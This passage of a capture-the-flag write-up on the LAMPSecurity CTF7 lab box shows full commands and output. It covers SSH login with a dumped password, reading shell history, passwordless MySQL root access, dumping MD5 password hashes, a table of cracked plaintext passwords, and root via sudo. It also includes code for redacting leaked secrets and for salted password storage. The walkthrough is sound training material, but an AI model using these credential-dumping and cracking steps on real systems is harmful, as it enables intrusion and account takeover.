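# 'password reset/rest to <secret>', with the secret as the last token.
LEAK_RE = re.compile(
    r"\bpassword\b(?:\s+(?:reset|rest))?(?:\s+to)?\s+(\S+)\s*$",
    re.IGNORECASE,
)


def find_leak(message):
    """Return the leaked secret in a message, or None if it is clean."""
    m = LEAK_RE.search(message)
    return m.group(1) if m else None


def redact(message):
    """Return the message with the secret replaced by a fixed marker, so the
    audit trail keeps its meaning without keeping the credential."""
    m = LEAK_RE.search(message)
    if not m:
        return message
    return message[: m.start(1)] + "[REDACTED]" + message[m.end(1):]


def scan(records):
    """Scan (id, message) pairs; return (id, secret, redacted) per leak."""
    findings = []
    for rec_id, msg in records:
        secret = find_leak(msg)
        if secret is not None:
            findings.append((rec_id, secret, redact(msg)))
    return findings


if __name__ == "__main__":
    for rec_id, secret, clean in scan(SAMPLE_LOG):
        print(f"row {rec_id}: leaked {secret!r} -> {clean}")
```

Run as a one-off over an existing table this tells you which accounts to force a reset on; wired into the logging call itself, `redact()` stops the next entry from leaking in the first place. Note that the SQL injection above only needed read access to this one table to yield a working SSH password.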

Low Privilege Access / Local Enumeration/Exploit Attempt #1

We are now able to access the CTF7 box over SSH (22/TCP) using ruby’s user account with the password we dumped from the log table.

calvinbebop@Dolos:~$ ssh ruby@10.0.88.9
The authenticity of host '10.0.88.9 (10.0.88.9)' can't be established.
RSA key fingerprint is SHA256:GfrI8RJ0/Xy8Za7qDP9Gm+RaoxuVz1GWo15hvn8+rdI.
Are you sure you want to continue connecting (yes/no)? yes  
Warning: Permanently added '10.0.88.9' (RSA) to the list of known hosts.
ruby@10.0.88.9's password: 
Last login: Sun Dec 23 20:32:41 2012 from 192.168.1.135
[ruby@localhost ~]$

Right off the bat, we can check and see that ruby’s user account cannot reach root via sudo. This means we’ll have to look elsewhere and find a way into another user’s account, since ruby’s doesn’t have the permissions we require.

[ruby@localhost ~]$ sudo su
[sudo] password for ruby: 
ruby is not in the sudoers file.  This incident will be reported.

Digging into ruby’s home folder, her .bash_history file hints that the local MySQL database may be accessible as root without a password.

[ruby@localhost ~]$ cd /home/ruby/
[ruby@localhost ~]$ ls -lsa
total 36
4 drwx------.  4 ruby ruby 4096 Dec 23  2012 .
4 drwxr-xr-x. 13 root root 4096 Dec 19  2012 ..
4 -rw-------.  1 ruby ruby  112 Dec 23  2012 .bash_history
4 -rw-r--r--.  1 ruby ruby   18 May 10  2012 .bash_logout
4 -rw-r--r--.  1 ruby ruby  176 May 10  2012 .bash_profile
4 -rw-r--r--.  1 ruby ruby  124 May 10  2012 .bashrc
4 drwx------.  3 ruby ruby 4096 Dec 19  2012 mail
4 drwx------.  2 ruby ruby 4096 Dec 19  2012 Maildir
4 -rw-------.  1 ruby ruby   38 Dec 23  2012 .mysql_history
[ruby@localhost ~]$ cat .bash_history 
sudo su
ls /var/www/html
ls /var/www/html/inc
cat /var/www/html/inc/db.php 
mysql -u root website
su julia
exit

Not only are we able to confirm passwordless access as the MySQL root account, but we are also able to dump the users table and retrieve a plethora of password hashes!

[ruby@localhost ~]$ mysql -u root website
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 13050
Server version: 5.1.66 Source distribution

Copyright (c) 2000, 2012, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> SHOW DATABASES;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| roundcube          |
| website            |
+--------------------+
4 rows in set (0.00 sec)

mysql> SHOW TABLES;
+-------------------+
| Tables_in_website |
+-------------------+
| contact           |
| documents         |
| hits              |
| log               |
| newsletter        |
| payment           |
| trainings         |
| trainings_x_users |
| users             |
+-------------------+
9 rows in set (0.00 sec)

mysql> select username,password from users;
+-------------------------------+----------------------------------+
| username                      | password                         |
+-------------------------------+----------------------------------+
| brian@localhost.localdomain   | e22f07b17f98e0d9d364584ced0e3c18 |
| john@localhost.localdomain    | 0d9ff2a4396d6939f80ffe09b1280ee1 |
| alice@localhost.localdomain   | 2146bf95e8929874fc63d54f50f1d2e3 |
| ruby@localhost.localdomain    | 9f80ec37f8313728ef3e2f218c79aa23 |
| leon@localhost.localdomain    | 5d93ceb70e2bf5daa84ec3d0cd2c731a |
| julia@localhost.localdomain   | ed2539fe892d2c52c42a440354e8e3d5 |
| michael@localhost.localdomain | 9c42a1346e333a770904b2a2b37fa7d3 |
| bruce@localhost.localdomain   | 3a24d81c2b9d0d9aaf2f10c6c9757d4e |
| neil@localhost.localdomain    | 4773408d5358875b3764db552a29ca61 |
| charles@localhost.localdomain | b2a97bcecbd9336b98d59d9324dae5cf |
| foo@bar.com                   | 4cb9c8a8048fd02294477fcb1a41191a |
| calvinbebop@gmail.com         | 7c6a180b36896a0a8c02787eeafb0e4c |
| test@nowhere.com              | 098f6bcd4621d373cade4e832627b4f6 |
+-------------------------------+----------------------------------+
13 rows in set (0.00 sec)

Hash Identification/Cracking

Using hash-identifier (or an equivalent online tool), we’re able to determine that these are MD5-hashed strings.

calvinbebop@Dolos:~$ hash-identifier 
   #########################################################################
   #	 __  __ 		    		__		 	 ______    _____	       #
   #	/\ \/\ \		   		   /\ \ 		/\__  _\  /\  _ `\	       #
   #	\ \ \_\ \     __      ____ \ \ \___		\/_/\ \/  \ \ \/\ \	       #
   #	 \ \  _  \  /'__`\   / ,__\ \ \  _ `\	   \ \ \   \ \ \ \ \	   #
   #	  \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \	    \_\ \__ \ \ \_\ \	   #
   #	   \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/	   #
   #	    \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.1 #
   #								 By Zion3R 							   #
   #							www.Blackploit.com 						   #
   #						       Root@Blackploit.com  				   #
   #########################################################################

   -------------------------------------------------------------------------
 HASH: e22f07b17f98e0d9d364584ced0e3c18

Possible Hashs:
[+]  MD5
[+]  Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

Luckily for us, MD5 hashes are relatively easy to crack, and numerous online sources are happy to provide the “decrypted” string for a given hash.

Hash                              Type  Result
e22f07b17f98e0d9d364584ced0e3c18  md5   my2cents
0d9ff2a4396d6939f80ffe09b1280ee1  md5   transformersrule
2146bf95e8929874fc63d54f50f1d2e3  md5   turtles77
9f80ec37f8313728ef3e2f218c79aa23  md5   Not found.
5d93ceb70e2bf5daa84ec3d0cd2c731a  md5   qwer1234
ed2539fe892d2c52c42a440354e8e3d5  md5   madrid
9c42a1346e333a770904b2a2b37fa7d3  md5   somepassword
3a24d81c2b9d0d9aaf2f10c6c9757d4e  md5   LosAngelesLakers
4773408d5358875b3764db552a29ca61  md5   Not found.
b2a97bcecbd9336b98d59d9324dae5cf  md5   chuck33
4cb9c8a8048fd02294477fcb1a41191a  md5   changeme
7c6a180b36896a0a8c02787eeafb0e4c  md5   password1
098f6bcd4621d373cade4e832627b4f6  md5   test
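What hash-identifier’s guess and the online lookups above boil down to is shown in this added example (my own code, not part of the write-up): a length/charset heuristic, a local dictionary check with `hashlib`, and, for contrast, the salted and stretched storage that makes such lookups useless. The hashes are a few of the ones dumped from the users table; the wordlist is constructed and deliberately tiny.

```python
"""Added example (not part of the original write-up): identify unsalted MD5
by shape, verify weak ones against a constructed wordlist, and show the
salted PBKDF2 alternative. Hashes come from the dumped users table."""
import hashlib
import hmac
import os
import re

HEX_RE = re.compile(r"^[0-9a-f]+$")


def guess_hash_type(h):
    """Length/charset guess in the spirit of hash-identifier. A 32-hex-char
    digest could be MD5, MD4 or NTLM; length alone cannot tell them apart."""
    h = h.strip().lower()
    if not HEX_RE.match(h):
        return "unknown"
    return {32: "md5/md4/ntlm (128-bit)", 40: "sha1 (160-bit)",
            64: "sha256 (256-bit)"}.get(len(h), "unknown")


# Constructed wordlist; an audit would use a real dictionary instead.
WORDLIST = ["123456", "password", "test", "password1", "changeme", "letmein"]

# Four of the rows from the dumped users table (user -> stored hash).
DUMPED_HASHES = {
    "test@nowhere.com": "098f6bcd4621d373cade4e832627b4f6",
    "calvinbebop@gmail.com": "7c6a180b36896a0a8c02787eeafb0e4c",
    "foo@bar.com": "4cb9c8a8048fd02294477fcb1a41191a",
    "ruby@localhost.localdomain": "9f80ec37f8313728ef3e2f218c79aa23",
}


def audit_unsalted_md5(hashes, wordlist):
    """Return {user: password} for every stored hash whose preimage is in
    the wordlist. One MD5 per word covers every user at once, which is
    exactly why unsalted hashes are cheap to look up online."""
    table = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return {user: table[h] for user, h in hashes.items() if h in table}


def hash_password_salted(password, salt=None, rounds=100_000):
    """Store (salt, PBKDF2-HMAC-SHA256 digest). The same password under two
    salts yields unrelated digests, so no precomputed table applies, and
    the round count makes each guess cost real CPU time."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds)
    return salt, digest


def verify_salted(password, salt, digest, rounds=100_000):
    """Constant-time check of a login attempt against a stored record."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds)
    return hmac.compare_digest(candidate, digest)


if __name__ == "__main__":
    for user, h in DUMPED_HASHES.items():
        print(f"{user:28} {guess_hash_type(h)}")
    print("recovered:", audit_unsalted_md5(DUMPED_HASHES, WORDLIST))
    s1, d1 = hash_password_salted("password1")
    s2, d2 = hash_password_salted("password1")
    print("same password, different salts, digests differ:", d1 != d2)
```

The takeaway for the application side is the last few lines: had the users table held salted PBKDF2 (or bcrypt/scrypt) records, the dump from the MySQL root shell would have produced no reusable SSH passwords.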

SSH Access (22/TCP) via Compromised Credentials

Using one of our newfound credentials, we were able to log in as brian with the password my2cents and obtain root privileges via sudo.

calvinbebop@Dolos:~$ ssh brian@10.0.88.9
brian@10.0.88.9's password: 
[brian@localhost ~]$ sudo su

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for brian: 
[root@localhost brian]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@localhost brian]#


EOL

Thank you for partaking in this week’s boot2root of LAMPSecurity’s CTF7 box! Another brilliant showcase of the impact that MySQL misconfigurations can have.
As always, if you have any questions, corrections, or comments, please feel free to reach out to me on Twitter and have yourself an excellent day!